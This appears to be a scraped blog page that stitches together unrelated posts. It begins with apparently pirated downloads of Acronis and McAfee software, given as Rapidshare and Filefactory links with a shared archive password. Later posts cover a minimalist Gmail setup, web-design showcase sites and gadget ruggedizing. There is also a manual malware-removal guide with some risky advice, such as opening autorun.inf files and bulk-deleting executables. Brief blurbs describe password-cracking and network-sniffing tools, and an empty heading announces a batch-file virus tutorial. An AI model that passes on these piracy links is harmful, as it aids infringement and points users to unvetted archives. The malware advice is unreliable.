Acronis All BootCD v2

Acronis All BootCD v2 | ISO | 288MB

It's got:
Disk Director Suite 10.0.2160
True Image Echo Enterprise Server 9.5.8115 with Universal Restore
True Image Echo Workstation 9.5.8115 with Universal Restore
Bootable Agent 9.5.8115 with Universal Restore
Snap Deploy 3.0.3183.2b
True Image Home 11

changelog:
Fixxed wrong image in v.1 ,True Image Echo Enterprise Server 9.5.8115 with Universal Restore
was True Image Echo Workstation 9.5.8115 with Universal Restore

From RS.com(3parts)
http://rapidshare.com/files/157897446/AcronisAllBootCD2.part1.rar
http://rapidshare.com/files/157901906/AcronisAllBootCD2.part2.rar
http://rapidshare.com/files/157904181/AcronisAllBootCD2.part3.rar

From Filefactory(3parts)
http://www.filefactory.com/file/14e738/n/AcronisAllBootCD2_part1_rar
http://www.filefactory.com/file/ca79ab/n/AcronisAllBootCD2_part2_rar
http://www.filefactory.com/file/b505cd/n/AcronisAllBootCD2_part3_rar

(Links are interchangeable. If you are a free user, you can download different parts simultaneously from Rapidshare and Filefactory to complete all the links.)

Password:full+free

McAfee Total Protection 2009

McAfee Total Protection 2009 | 80.7MB

Safe Search & Surf

McAfee Total Protection adds safety ratings to web sites and search engine results based on comprehensive spam, adware, and online scam safety tests. SiteAdvisor analyzes the results and rates web sites in detail for unsafe or annoying practices such as dangerous downloads, spamming, misuse of personal information and browser hijacking. When searching with Google, Yahoo! or MSN, SiteAdvisor provides easy-to-understand safety ratings—red (danger), yellow (use caution) or green (safe)—that appear next to search results, helping you make informed decisions.

McAfee SiteAdvisor Plus

McAfee SiteAdvisor Plus extends safety ratings to the links in emails and instant messages, and blocks your PC from visiting dangerous web sites with a "protected-mode" option.

Always Updating

McAfee Total Protection continuously and automatically delivers the latest software updates and upgrades so you are never under-protected or overwhelm by ever-evolving and emerging online threats.

Stops Viruses

McAfee Total Protection automatically guards your PC from viruses, mass-mailing worms, backdoor Trojans and more. It also automatically cleans or quarantines infections with minimal interruption. Other built-in features include:

-McAfee SystemGuards watch for activity that may signal a virus, spyware or hacker is on your PC
-Always active detection that watches key system, Windows, host file and browser settings for suspicious changes such as DNS poisoning (a.k.a. pharming, which can redirect browsers to fraudulent web sites) or activity that can compromise anti-virus security
-McAfee X-Ray for Windows removes dangerous root-kits and other malware that can hide deep in your operating system

Halts Hackers

Constant inbound and outbound monitoring helps McAfee deter hackers, identity thieves and malware programs from robbing data, hijacking your system (e.g., to send spam) or planting viruses that can compromise privacy over dial-up or broadband. Fast "load and go" setup, customizable security levels, visual tracing, smart alerts, full screen mode and intelligent application handling help fine tune security, identify the source of threats and block suspect programs from "phoning home" personal information. Other built-in features include:

-Stealth Mode helps hide your presence online, making your system practically invisible to global hackers.
-HotSpot detection automatically elevates McAfee firewall security when you are not on your trusted network.
-Boot-time protection shields your system from unauthorized connections before security programs are fully load.

Blocks Spyware

McAfee's spyware protection detects, blocks, and removes spyware, adware, and other suspicious programs before they can steal log-ins and passwords (key-loggers), hijack your dial-up connection (Web dialers), track online surfing (cookies) or flood your surfing with annoying pop-up ads. Better protection based on new integrated anti-virus, anti-spyware engine. Now also detects and blocks tracking cookies.

Improves PC Health

McAfee SecurityCenter's dashboard-like display helps you at a glance review your PC's security status and modify it with one-click. You can also easily check for updates, fix potential security issues or view settings in basic or advanced modes.

With built-in McAfee QuickClean technology, McAfee Total Protection helps optimize your PC’s performance, eliminating drive-clogging "Internet build-up" (e.g., temp files, cached files, file remnants, Active X code), unused programs and other unnecessary clutter to free up valuable disk space. It also features a network map that shows the security status of your home network

Secures Your Identity

McAfee Total Protection helps secure personal identification and financial information (e.g., name, phone, credit card, bank account numbers) from transmission over the Internet without permission. Featuring McAfee Shredder, sensitive files can be permanently deleted so as not to compromise your privacy.

McAfee's anti-virus, anti-spyware, firewall and anti-spam security work together as a multi-layered shield against multi-faceted identity theft threats that may use a combination of malware to steal files, financial log-ins and other personally identity information. The suite also includes Password Vault, which safely stores Web login-ins, passwords and other personally identifiable information in a secure, password-protected, easy-to-access location.

Prevents Spam & Email Scams

McAfee Total Protection automatically recognizes and helps stop junk email—including identity and credit card scams, virus hoaxes and foreign language spam—from polluting your inboxes while letting trusted email through. Timely anti-spam filter updates ensure that you have the latest protection against spammers. More accurate spam detection, filtering and blocking with fewer false positives (email accidentally labeled spam).

Protects Children Online

McAfee Total Protection helps shield each family member from inappropriate Web content, online predators and chat using age-specific adjustable settings and easy-to-use filtering options. Also, the suite features McAfee ImageAnalyzer that protects children from viewing offensive images online.

Backs Up & Restores Files

McAfee Total Protection provides an automated back-up feature that preserves encrypted copies of irreplaceable photos, music files, videos and documents on CD/DVD, USB or external or network drives. With one-click, you can easily retrieve these archived files.

Network Monitoring

McAfee Total Protection verifies that your home PCs have McAfee properly installed.

From Filefactory
http://www.filefactory.com/file/af2e6e3/n/MATP09_rar

Password:full+free

Warning:Buy original softwares only. We are not responsible for your unlawful act.

Windows 7 ThemePacks and Wallpapers AIO

Windows 7 ThemePacks and Wallpapers AIO
AIO ThemePacks | 372 MB |-| AIO Wallpapers | 713 MB
Designed for people who want it all

AIO Themepacks From RS.com
http://rapidshare.com/files/298545895/Themepacks.part1.rar
http://rapidshare.com/files/298558903/Themepacks.part2.rar

AIO ThemePacks From Filefactory
http://www.filefactory.com/file/a16ba4d/n/Themepacks_part1_rar
http://www.filefactory.com/file/a066426/n/Themepacks_part2_rar

AIO Wallpapers From RS.com
http://rapidshare.com/files/298571521/Wallpapers.part1.rar
http://rapidshare.com/files/298585974/Wallpapers.part2.rar
http://rapidshare.com/files/298601318/Wallpapers.part3.rar

AIO Wallpapers From Filefactory
http://www.filefactory.com/file/a06670b/n/Wallpapers_part1_rar
http://www.filefactory.com/file/a0668gc/n/Wallpapers_part2_rar
http://www.filefactory.com/file/a1f8313/n/Wallpapers_part3_rar

(Links are interchangeable. If you are a free user, you can download different parts simultaneously from Rapidshare and Filefactory to complete all the links.)

Windows 7 Ultimate DVD Cover From RS.com
http://rapidshare.com/files/298794139/DVD_Cover.rar.html

Windows 7 Ultimate DVD Cover From Filefactory
http://www.filefactory.com/file/a17h685/n/DVD_Cover_rar

Password: full+free

Note: We don't keep any of the files on our servers, we just direct to the source.

Ultra-Productive Gmail Configuration

Minimalist Gmail: How to Get Rid of the Non-Essentials

My new minimalist Gmail inbox.

I’ve been running a Minimalist Gmail setup lately, stripped of nearly everything but, you know, emails … and I’m in love with its simplicity.

There’s something pure about having nothing but the essentials.

Now, some of you will recall a couple of other posts I did, and let’s quickly review them for background:

1. Not long ago, I did a post on How to Make Gmail Your Ultimate Productivity Center. This was Gmail fully loaded, with gadgets for Google Calendar, Google Docs, delicious, Twitter, and much more. This was good, and I still recommend it to most people who want one place for everything they do.

2. Even less ago, I boldly announced I was Killing Email and ditching my inbox. A dramatic announcement, I know, from someone who has been such a Gmail fanboy for at least a few years.

So, two things: one, I haven’t completely killed email. I still use Gmail, though not as often. I have moved most of my communication to Twitter, Google Docs, a wiki, and Basecamp. But I still do email, a little. It’s a hard thing to kill, but maybe drastically reduced email usage is OK with me. It’s certainly less stressful.

Two, when I do use Gmail, lately, I am bothered by all the clutter. I removed all the gadgets, and still too much. Google is known for its simplicity, but I really wanted to strip out not only ads but chat and the navigation menus at the top and more. So I did.

I’ve used Greasemonkey for Firefox and some great user scripts, listed below, to achieve this. I thought of rewriting Gmail’s CSS, but user scripts are much easier. It didn’t take long — just Googled every little thing I wanted to do, and found others had already solved the problems, one at a time.

Here’s how I’ve made Gmail into a minimalist inbox:

1. Fire and Grease. First, be sure you’re running Firefox with Greasemonkey installed. I love the minimalism of Google Chrome — been running both the dev version and latest Chromium builds — but unfortunately it can’t do what Greasemonkey can, at the moment. So I mostly just use Firefox for Gmail now.

2. Remove gadgets. First thing I removed was gadgets — go to Settings, then Gadgets, and remove any you have installed. I had Twitter and Delicious. Then I went to Labs under Settings, and disabled “Multiple Inboxes” and the Google Docs and Google Calendar gadgets, as well as the option to move the Chat box to the right side of Gmail. Things were starting to get cleaned up!

3. Hide labels, chat, footer. I really wanted to remove chat but couldn’t figure it out. Also, the clutter in Gmail’s footer was bothering me. So I found this brilliant user script: Gmail 3: Hide Labels, Chat and Footer. Install it in a click, and voila! Lovely.

4. Remove ads. Ads on the right side of email messages also bothered me. Found a script to do this: Gmail Ad Remover. Added benefit of maximizing your screen space for messages.

5. Remove stars. It’s a minor thing, but the stars are unnecessary for me. I don’t use them for task management (did at one time), so what’s the point? Gmail Remove Stars to the rescue.

6. Gmail logo and searchbar. Found Gmail toggle searchbar area script. Cleans things up nicely. You can always toggle the search area back on if you need it, but most of the time when I’m processing email, responding, I don’t need this.

7. Menu navigation bar. This was the most annoying. I couldn’t figure out how to remove the navigation menus that run across the top of Gmail. Then found the Gmail Real Estate script. It actually toggles not only the navigation menus, but the search area too. This somewhat duplicates the logo and searchbar script’s function above, but I’ve found they actually work nicely together, allowing you to show just a minimal navigation bar if you like, or whatever you feel like showing at the moment. I normally have everything minimized.

Updated: 8. Clean up rows and remove the “inbox is empty” message! Matt Constantine responded to this post by writing two excellent Greasemonkey scripts. The first, called Gmail Clean Rows, removes the lines and other clutter from your inbox’s list of emails. The second is called Gmail Empty is Empty, and removed a small annoyance of mine — the message that shows up when your inbox is empty that says “No new mail! Want to read updates from your favorite sites? Try Google Reader”. Now the empty inbox is really empty, which is lovely lovely.

Updated: 9. Remove extraneous buttons. Matt Constantine took it a step further, at my request, and wrote Gmail Inbox with Less Buttons, removing all the buttons above and below the inbox, except archive, report spam and delete. This is perfect, because I don’t have a need for the move-to, label or more actions drop-down buttons, or the refresh link, or the Select links below all the buttons. Your needs may vary.

And that’s it. It might sound complicated, but basically it’s turning off some options in Gmail’s settings, and then installing a few user scripts. It should just take a few minutes. See the before and after pics below.

How I Use Gmail, the Minimalist Way
Now that everything is stripped down — no gadgets, no chat, no labels or stars — I just process and reply to email, and empty my inbox. Here’s how:

1. Use keyboard shortcuts. See this list if you don’t already know them. Pressing a key such as “c” or “r” or “a” to do email messages, or “j” or “k” or “x” or “y” to navigate and select and archive, is much faster than using the mouse. I can process very quickly using shortcuts.

2. Remove all unnecessary incoming email streams. Very important. Unsubscribe from all newsletters, all ads sent to you from businesses, all notifications from other services you use. Filter out messages from people who just forward jokes or chain mail. I no longer publish my email address, and give people other options for getting the info they want, so only my closest friends or business partners email me. Leaves the inbox relatively uncluttered.

3. Process quickly. Just run through your inbox, processing like lightning. Each email requires instant action: archive or trash, reply then archive, put on your task list (see next item) and archive. Or just do the task now, and archive. Those are the only options. Should take 10 minutes tops.

4. Tasks. I use a separate task list these days (Anxiety, a very simple Mac app) to make a quick note of any tasks, so that I can archive an email without needing it in the inbox as a reminder. Gmail Tasks is another good option — I don’t use it these days because I keep my email closed most of the time, and want my small task list open when I need it without having to open Gmail.

5. Short messages. Keep things short, and it doesn’t take long to reply. I try to do it in 3-5 sentences. I rarely go over this.

Before and After Pics
Took some screenshots to illustrate the changes. Click the thumbnails to see full images. Update: I’ve changed the “after” screenshot to illustrate the new scripts noted above by Matt Constantine.

Edit: The Firefox theme you see in the screenshots is Chromifox Basic, modeled after Google Chrome. I didn’t mention this above, but I removed most of the toolbars and icons from Firefox awhile back, to make Firefox as minimalist as I can. You can do this in the View->Toolbars menu, unselecting toolbars and removing icons as you please.

Before:

After:

Source:Zenhabits

16 Outstanding Web Design sites

We all hope that their site is pretty special, in fact, its design is something of your favorite website is, I think we on the basic code is available, but from an excellent site designer there is still a distance, It does not matter, as long as a good guide, good Let's website can also design their own. http://sixrevisions.com/ Jacob Gube in his blog readers to seek the views, summed up the http://sixrevisions.com/web_design/16_sites_web_design_inspiratio/ 16个excellent site design Site . For all foreigners may not like something, but it is undeniable that some things they really deserve Let's study.
Following is the profile of the 16 sites, we hope to help:


1, http://www.thebestdesigns.com/ The Best Designs

The Best Designs is a ready-made high-quality XHTML view of the excellent design and Flash web site, the site marking and design of each of the keywords (such as bold, and color, or with a better CSS) To give readers more easily get their wish to search things.
2, http://cssremix.com/ CSS Remix

CSS Remix is a (according to their own profile) Web 2.0 Best Design Nongchao Er. Of course, the site also includes some non-Web 2.0 theme design. CSS Remix of readers more than 14,000 subscribers, where a designer can access the design work of other designers, depth exchanges, is a Need for exchange platform.
3, http://cssmania.com/ CSS Mania

CSS Mania is a collection of CSS-based page design a website to collect good after they have carried out regularly updated. Up to now, has collected 10,000 designer's works. May be due to excessive collection of works because of uneven quality of works, many people grasp the handle.
4, http://screenfluent.com/ screenfluent

screenfluent is a beautiful page on the site, is special about a modal window preview, to give readers visual effects experience. Has collected 7,000 selected design, has rich connotations.
5, http://www.screenalicious.com/ Screenalicio.us

Screenalicio.us has more than 9,800 reference design, but also points readers to the function, divided into five out, so readers can also design a selective refer to the score.
6, http://www.oswd.org/ Open Source Web Design

Open Source Web Design a shared community, members can upload your own design code-sharing to the public. Downloading code is not unlimited free, 1 OSWD (do not know the meaning of this unit) following the design of the download is free. Members can download this site's design code, look.
7, http://onepagelove.com/ One Page Love

One Page Love is a basic page design of the exhibition hall to display the contents include: the beautiful, creative Web sites and applications. Categories including business, moderate, news, etc., etc., including integrated relatively miscellaneous.
8, http://www.fullsingle.com/ FullSingle

FullSingle and One Page Love , is on the single-page design of the site, the site of each page will appear as outstanding works selected profile, to tell you about these designs What, what good such.
9, http://onepagefolios.com/ One Page Folios

One Page Folios is also on the design of the single-page, single-page summary is a combination of site design and development of the site, the inside has been more than 800 groups in the portfolio for reference.
10, http://wel
ovewp.com/ We Love WP

Wordpress for the use of the blogger, this site is worthy of collection. We Love WP will share some of the top wordpress designs, of course, also shared some pretty wordpress theme.
11, http://cssdivine.com/ CSS Divine

CSS Divine is a paradise based on the design of CSS, CSS kinds of design complete, the right Sidebar useful in various colors make the Tag, click on the search based on the color you want the CSS design. Categories include arts, business, clean and business.
12, http://www.designsnack.com/ Design Snack

Design Snack since the superscript: You can control the design architect. Like The Best Designs , this is also a XHTML and Flash on the excellent site design, in this site, you can customize the way to display all kinds of design, a design for a vote, or Color is a tab to browse the design.
13, http://www.strangefruits.nl/ SF art & design portal

SF art & design portal is a portal on the web site design, unique, innovative and artistic temperament of the design features of this site. You can by category, style, color, national or even visit the design.
14, http://designshack.co.uk/gallery/all/ Design Shack

Design Shack is exclusively designed to provide top quality based on the CSS website, come to the fore the works is they're looking for. The site also provides tutorials and design of the lessons learned.
15, http://www.cssloaf.com/ CSSloaf

Others collected a good thing, CSSloaf collect once, it collected 35 of the good things website design, so we do not need to read elsewhere. The site features is the extraordinary display of maps, make clear at a glance.
16, http://www.edustyle.net/ eduStyle

Edu see in the know that this site is devoted to educational institutions which exist, it focuses on higher education for the design of the site, showing the best design.

Source:loserblog.cn
Tags:16 Outstanding/Mindblowing/Outstanding/Amazing/Great Web Design sites,web designing,

How to Ruggedize Your Own Gadgets (With Video!)

Popular Mechanics has a detailed how-to on diy ruggedization of common portable electronics such as laptops, cameras, and cellphones. There is video of a laptop surviving an eight foot fall due to the tennis balls, pipe insulation, and weather stripping they’ve added. Its not just shock resistant, they’ve used a two-part compound marketed for making custom molded earplugs to make the laptop water resistant

Advanced Malwares - Beware of them !

Though I don’t like telling stories, this one is really adventurous and I suggest you reading it since its about an encounter with a deadly malware and I am the hero!

As I had described in my previous posts, the conventional way of zeroing in on a virus, seemed to be really apt to me for all kinds. This was the same until I saw new viruses in my college digital library ( I would rather call it virus vault!). They were a breed apart, unlike normal viruses, they didn’t have any visible process running in task manager. This made it really tough to mark their presence in PCs. For a while I was tricked into believing that they didn’t exist on the PC and it had slowed down because of other issues. When I brought back home my pendrive, I noticed a new file U.COM in it, which didn’t execute thanks to my folder autorun.inf which is always present on my pendrive. Now I was sure the virus was present at college PCs, but didn’t have enough patience and time to go back there to try busting it, the place being public in nature.

A few days ago I was at my friends place, whose system gave a whole lot of problems ranging from slow start up, net getting disconnected, and browser hanging with errors. He was pleading to format his system and repartition it to remove any malwares hiding in other drives. FORMAT!!! The word I hate the most! I sat there with determination that its either the malware or me that’s getting screwed, and was able to ultimately fix it. Here is how I did it…..

1. Opening task manager didn’t do much help since it showed no presence of any suspicious process.
2. Upon opening a drive, it opened in a new window. This made me certain that some code was being executed prior to opening the drive, marking presence of an autorun.inf file, which will be super hidden.
3. Initially I tried restoring registry defaults, but it didn’t worked, indicating malware was active and was monitoring registry changes and re-writing the malicious keys if original entries were restored.
4. Since the only thing I was certain of was presence of a autorun.inf file, I went for the kill. Using killbox, wrote address of file as C:\autorun.inf and was able to find the file and deleted it. Since killbox takes backup of deleted file in a folder in C: drive, I accessed the file. Opened it by double clicking it ( don’t be afraid, these files wont eat up your system when opened!). I found code to execute a U.COM file on drive autorun. This made me happy since I got another chance to take my old revenge with this guy!
5. Using killbox, I gave instruction to delete the file C:\U.COM. I was able to find the file and deleted it. I repeated steps iv and v for all drives.
6. To be certain to delete all files, I searched internet for details on malware named U.COM and was able to find what all files it creates. I deleted,

c:\windows\system32\drivers\klif.sys

c:\windows\system32\olhrwef.exe

c:\windows\system32\nmdfgds0.dll

and delete the registry key-

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run cdoosoft C:\WINDOWS\system32\olhrwef.exe

1. Having cleaned the mess, I restored windows registry defaults, entered each drive, created a dummy autorun.inf folder and deleted suspicious files as well. Also delete all files that killbox had taken backup after deleting. I deleted all files from all temp locations and using ccleaner, deleted the start up entries of U.COM. Search in registry editor for U.COM entries and delete them all. Usually there are other related entries in the same sub key, delete them too. Restart your system and check if every thing is OK.

The malware U.COM comes in the category of CLOAKED MALWARE, the new generation viruses. They run hidden from task manager, inside a back ground service, like svchost, along with other system processes. They write to other programs virtual memory, also called as process hijacking. They are packed and/ or encrypted to be invisible to our eyes. It is added as a Registry auto start to load Program on Boot up. It creates various files inside system32 folder and also in all drives and alters registry to hide its files from user.

PC slow and don’t see any reason why, beware, you could be a victim!!

Source: PC Gyan

Guide - Removing Malwares

If someone says that he never encountered a malware infection on his PC, probably he is lying. What ever antivirus you use, at some point of time, you will face this occasion that PC gets infected and your antivirus never detected it. Modern day heuristics enabled antivirus have reduced such chances, but most of the time its not so. The strangest thing about malware is that you feel their presence without any diagnostics! May be that’s because of the resonance that we develop with our PCs over time…!

Let’s first learn what malware are…

Types of malware:

1. Virus: A virus is a malicious program that can replicate itself and affect normal operations of a system without knowledge or permission of the user. It attaches itself to executable code and runs every time the code is run, making multiple copies of itself. It corrupts the files, denies access to data and hence renders data useless.
2. Worm: Unlike a virus, a worm is independent and doesn’t attach itself to any file or code. It is capable of spreading without need of any host file. It replicates by copying itself through network. Worms prominently attack only networks, sending its copies to all users in your address book, causing DoS (Denial of service) attack and affecting your internet functionality.
3. Trojans: As the name goes, it hides inside a seemingly legitimate program and runs malicious code from there. Once run, the host computer gets infected and it starts replicating. It performs various activities like sending your data to its creator, or logging what you type (your passwords, bank account details) and sending them to its creator without your consent. It can even cause damage to your data by simply deleting it. Trojans have capability to change their code to trick the antivirus programs into not detecting them. Some are even scheduled to strike at preset dates.
4. Spyware: Very similar to Trojans, these applications are solely designed to steal your data. But unlike Trojans, they don’t have the capability to replicate themselves.
5. Cloaked malware: These are the new generation malware that are becoming a nightmare in computing sector. Cloaked malware are Rootkits that are invisible to windows explorer and hence to antivirus. They run hidden from task manager making it difficult to mark its presence. Its files are hidden on system and thus antivirus doesn’t detect them.

So, these are malware. Once executed by us, they go active in system memory, multiplying and applying constrains to privileges and adding entries to registry to make sure that are run at least once when system starts. They add malicious entries to registry to make sure that they are masked by disabling task manager, registry editor and folder options. They make files that enable them to be executed when drives are opened and continuously monitors ours system to gain chance to spread. But how do we identify their presence in our systems? These are the symptoms….

Identification:

i. Unrecognised processes and files: The presence of unrecognised processes running in task manager or presence of unrecognised files on drives marks presence of malware.

The key to identifying the presence is to keep vigil on the processes that run in back ground. This begins from day you install a software, see what process it runs. Also remember what all files you have present on your hard drive. Any new file or folder with .exe extension, anything with provocative name or cute icon can potentially be a result of infection. In event of task manager being disabled, process explorer by sis internals can be used to analyse processes running.

ii. File and system behaviour: If you ever notice that drives open in new windows, system taking more time during startup, CPU showing excessive activity even on no load or files or folders reappearing even after deleting them or not getting deleted at all, there is a high probability that your system is infected.

Files in pendrive disappearing and being replaced by smaller folders (with .exe extension if noticed) very clearly indicated presence of malicious code.

File activity can be detected by using the application filemon. An expert view on file activity can easily uncover malicious activity.

iii. Network activity: If you get complaints that some of your friends are getting strange e-mails from you, with links to unknown sites or strange file attachments, this could be a worm at work.

Increased network activity noticed in portmon etc also implies presence of network worms.

iv. Reduced privileges: Getting error messages of “ ….disabled by administrator….” on running RUN , Task manager or accessing Registry editor etc plainly implies your system is infected and malicious entries made in registry.

v. Malicious entries in registry: Same implies when you get errors on startup like file not found etc. This is because of malicious programs making entries in registry to auto start at system startup. This can also be analysed by using the application autoruns from sis internals suit. Or simply run MSCONFIG in run menu and check startup applications.

These symptoms confirm presence of malware in your PC. Now that you know that you two aren’t alone, how do you zero in on the culprit, keeping in mind that your loyal antivirus let it in? Here under is a step by step procedure to catch the culprit and to kick it out. Stop all other applications and disconnect the internet. Keep your weapons handy…….. War has begun!

Eradication of malware:

i. Identification of process in memory: Once executed, the conventional malware tend to be active in system memory, running a process that carries out the task the malware was designed to do. Nowadays it is common that malware alters registry to disable task manager, Run and registry editor, hence use process explorer to view active processes in memory. Tips to identification includes-

a. Usually a few malware are easily identified by very high CPU usage even when you aren’t running any CPU consuming application.

b. Many carry names that are suspicious to even laymen. Some include Khatarnak.exe, khatra.exe, music.exe, new folder.exe, soundmix.exe, etc. Most of them run under the explorer section in process explorer.

c. Smart viruses today carry names that are spoofs of windows processes. Like Regsvr32.exe is a windows application, but virus carry name Regsvr.exe. Similarly a malware spoofs the name of windows service host svchost.exe and run a process svcshost.exe. In such cases identification becomes tough and depends more on your experience and logical approach. Obviously a process Regsvr.exe isn’t expected to run always in your system. And a service host with odd spelling that runs under explorer is suspicious. Assistance can always be taken on-line regarding any suspicious process.

d. Repetitive processes of same name present in memory, when just one or no such application is running, also points out that the process is malicious code. But svchost.exe is one exception, with 5 such processes running at a time.

e. Reverse analysis can be made by identifying all legitimate processes and their triggering applications to identify the left out applications as suspicious.

f. Cloaked malware aren’t easily identified since they run hidden from explorer. Their files and memory residency isn’t visible. Hence, their presence is hard to verify. The sis internals tool Rootkit revealer does a good job in detecting Rootkits. It scans registry and file system for discrepancies and lets us know possible Rootkits that are actually present but not mentioned in windows API. Extreme caution should be taken while taking any action based on its result, since it just gives a probable result and not certain.

Having identified the malicious process in memory, the next task is to know where it is executing from. This can easily be verified from process explorer.

ii. Stopping the malicious code execution: The next step is to stop the execution of malicious code. The malicious code as long as active in memory can keep multiplying, and monitors system to maintain its malicious action and keeps vigil on registry, not allowing it to be rectified. This task can simply be done by task manager/ process explorer or may even need a boot from secondary device.

Note: Now on, don’t open any drives by double clicking on them, since this can trigger drive autorun which is usually linked to auto running malicious code using an autorun.inf file. Open drives by address bar or explore instead. Do not open any new folders etc, since they can probably be masked Trojans having folder icon!

a. The basic step is to end task the identified malware to stop its execution. This can be done directly by process explorer .In case a new malicious process pops up on termination of the first process, probably its running from another location. End task that process too. Preferably end task the process tree, but be sure you have noted down where from it is executing.

b. In case the process keeps on starting again and again, it probably got another file backing it up. In that case, using killbox, end process and delete the file. To use killbox, it is required to know the location of the file, which is obtained from process explorer.

Note: Even if file was end tasked in step a. , it has to deleted using killbox. The reason killbox isn’t given priority to end explorer shell is that while deleting the file with ending explorer shell, it restarts the windows explorer, which is often accompanied by malicious code executing again. The best way is to end task the process using process explorer, delete it using killbox. If file is in use, unlock it using the tool Unlocker, and then delete it.

c. Some smart malware can’t be deleted even using killbox, sighting privileges issues. Then it is required to boot from a secondary device, preferably Bart’s PE live CD and delete the malicious files.

d. Rootkits once identified can be deleted the same way as above using killbox or by boot through a secondary device. Since the process they run is hidden, it becomes tough verifying if the malware execution has stopped or not. Rely on your instincts to see if every thing is ok or assume at this stage that malware is not active in memory now.

iii. Regaining authority: Malware usually limits our privileges to make sure it is hidden or cant be detected. These include disabling task manager, Run, registry editor or disabling registry import etc. The next step is to regain control of our system.

a. Using Windows group policy editor (Found in system32 directory), Go to User configuration- Administrative templates- Start menu and task bar. Go to remove Run menu from start menu and disable it. This enables Run command. Now on, group policy editor is accessible by typing gpedit.msc in run menu.

Group policy editor can be used to modify user privileges, and can undo them too. But taking simplicity of other procedure into account, we prefer the other ways.

Note: gpedit isn’t available in windows XP home edition. The stand alone module to modify group policy can be downloaded.

b. In run type,

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

And run the command. This removes the entry in registry that had disabled registry editing. Now registry editing is allowed, though windows registry editor may still be disabled.

Note: Type the above command in a notepad and store it. Change extension to .bat , you get your own registry editing enabler tool!

c. Download the windows registry defaults entries from downloads section and add them to registry. This enables registry editor, task manager, folder options.

At this stage if you realise that restored defaults are altered once again to impose restrictions, this means malware is still active in memory. Repeat the identification and stop its execution.

iv. Removing supporting restart mechanisms: Now that malicious code isn’t active in memory, the next step is to remove its supporting mechanisms. Every malware once executed, makes sure that it is executed at least once on every system start up. This is achieved by entries in registry or modifying autoexec.bat or config.sys etc. Entries in registry are the most preferred option by malware, and we will go by it.

a. Many malware leave behind triggering files in drives that restarts the malware in full force once the drives are double clicked. They work by making a autorun.inf file linked to triggering malware file such that every time drive is autorun, the malware is triggered again. Our first priority is to remove such kind of start mechanisms.

Open my computer, go to folder options and enable view hidden files and folder, un-tick hide extensions of known file types & hide protected operating system files. Upon un-ticking hide protected operating system files, a confirmation is asked, confirm positive. Once finished, apply the settings. Now enter C: drive by address bar or by right clicking and explore. You will now see many files that were hidden earlier.

Check presence of any autorun.inf file. Open it by double clicking it (it wont hurt!!) and if readable, check what file was meant to be auto run.

Caution: There are many system files visible that are responsible for booting your system. Do not go on a random deletion spree, lest your system doesn’t boot again!! Some of the system files and folder are:

Autoexec.bat, config.sys, hiberfil.sys, pagefile.sys, IO.sys, MSDOS.SYS, boot.ini, NTDETECT.COM, ntldr and config.sys folder, system volume information folder, recycler folder etc.

Delete the file mentioned in autorun.inf file and also the autorun.inf file itself. Also delete anything like a folder of any name with an .exe extension. Also delete any other .BAT or .COM file other than those mentioned above. Repeat the process for all drives, opening each of them without double clicking them. In event of confusion, take help online, preferably on another system.

1. Entries at registry are made to make sure that malware executes at every system startup and stays in memory. Use the tool autoruns from sys internals to check start-up keys in registry. It lists all processes and files scheduled to be autorun at startup, but mixed up with windows applications. A few not so smart malware make entries that are visible in startup of MSCONFIG (Run MSCONFIG in run menu). A much useful tool is HijackThis from trend micro. This tool lists all non windows processes starting at startup making it possible to have a clear picture of scenario. It has a tool called ADS scanner that can be used to detect Rootkits as well. All such malicious entries are to be simply deleted.

v. Finishing with cleaning all scrap: By this time you will know what had struck you. Search on net for more details regarding the infection and delete its sister files as well. Had there been any entries that were left ignored by you, delete them too, verifying them from net.

Clean all temporary files, type temp, %temp%, prefetch in run command (one at a time!) and open the locations. Delete all files stored in them. Use Unlocker to unlock any locked files. Delete all cookies and other files in download folders. Go for a manual hunt in documents and settings folder and delete any last traces of infection.

Some Trojans mask themselves with folder icons, go to search and search the system, including hidden files, for all files with .exe extension. Type *.exe in search tab. A lot of applications will appear in search results, delete those with icon of a folder. You can also search for “new folder.exe “in search.

Delete all previous system restore points, since they may be hiding infection. Keep an antivirus handy. Restart your system now. Check startup time, verify task manager is working and check processes running in it. If all things work fine, congrats!! You just won the battle!!

Any cryptic error messages like file not found means start up entries for malicious code are still present though code is not. Simply run HijackThis again and delete the entries. Install a good antivirus and update it. Preferably re-install the web browser too.

Now that your system is malware free, make a commitment to her that now on you play clean, play safe. Keep updating your antivirus and be cautious online, avoid dirty sites, install an antivirus with site advisor, be extra cautious with removable media.

Hope you live happily hereafter!!

Note: A case study- Remove System security fake antivirus.

Due to popular demand noticed, I have posted the specific procedure to remove system security malware manually.

Kill processes:
Open Process explorer and kill the process named 1632575944.exe . It may also carry some other number as name. Kill it, after you note the location it is executing from.

Delete registry values:

Open registry editor and delete the value. You may need to restore defaults using my restore default tool to enable registry editing and other defaults( Go to home page and download it from downloads section).
%UserProfile%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “1632575944″

Else you can use the autoruns tool and delete this key from logon tab.

Delete files:

Search and delete the following files. You can use windows search too.
1632575944.exe, config.udb, init.udb, English.lng, German.lng, Spanish.lng, System Security.lnk

Delete directories:
c:\Documents and Settings\All Users\Application Data\538654387
c:\Documents and Settings\All Users\Application Data\538654387\Languages
C:\Documents and settings\All Users\Start Menu\Programs\System Security

Reboot and check if every thing is ok.

Source: PC Gyan

Firefox Master Password Recovery Tool

It’s great in this day and age that browsers can remember our passwords for us, allowing us cross-site security without the hassle of memorizing a million different random passwords. It’s great, that is, until we forget our master password. Fret not, though; there is a solution. The folks over at Lifehacker show us how to use FireMaster to recover forgotten or misplaced Firefox master passwords. Perhaps a better solution is to just store those tricky passwords where nobody will find them.

Cain and Abel: Windows password recovery utility

As far as password recovery utilities go, Cain & Abel is by far one of the best out there. It’s designed to run on Microsoft Windows 2000/XP/Vista but has methods to recover passwords for other systems. It is able to find passwords in the local cache, decode scrambled passwords, find wireless network keys or use brute-force and dictionary attacks. For recovering passwords on other systems Cain & Abel has the ability to sniff the local network for passwords transmitted via HTTP/HTTPS, POP3, IMAP, SMTP and much more. We think it is quite possibly one of the best utilities to have as a system administrator, and definitely a must have for your toolbox.

How to make your own Batch file Virus ? Part II

* Written for Educational purpose only.

